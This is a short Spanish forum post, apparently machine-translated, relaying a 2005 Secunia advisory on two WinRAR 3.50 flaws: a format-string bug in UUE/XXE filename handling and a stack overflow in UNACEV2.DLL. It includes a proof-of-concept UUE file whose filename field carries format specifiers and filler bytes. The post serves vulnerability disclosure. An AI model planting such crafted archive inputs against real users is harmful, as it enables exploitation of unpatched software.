Autor
* Versión 3,50 de WinRAR
Sistemas Inmunes:
* Versión 3,51 de WinRAR
1) un error de la secuencia del formato existe cuando exhibe un mensaje de error de diagnóstico, que informa al usuario un nombre de fichero inválido en un UUE/XXE encoded file. Esto se puede explotar para ejecutar código malicioso cuando se descifra un archivo malévolo de UUE/XXE.
Prueba de Concepto:
Código:
El siguiente archivo producira la vulnerabilidad de ¨format string¨ en WinRAR
begin 644 %0.8x.%0.8x.%0.8x.%0.8x.%0.8xAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
`
end
begin 644 %0.8x.%0.8x.%0.8x.%0.8x.%0.8xAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
`
end
2) un error de límite en UNACEV2.DLL se puede explotar para causar un stack-based buffer overflow. Esto permite la ejecución del código malicioso cuando un archivo modificado del ACE que contiene un nombre de archivo excesivamente largo, se extrae.
Fuente:http://secunia.com/secunia_research/2005-53/advisory/
Salu2
En línea
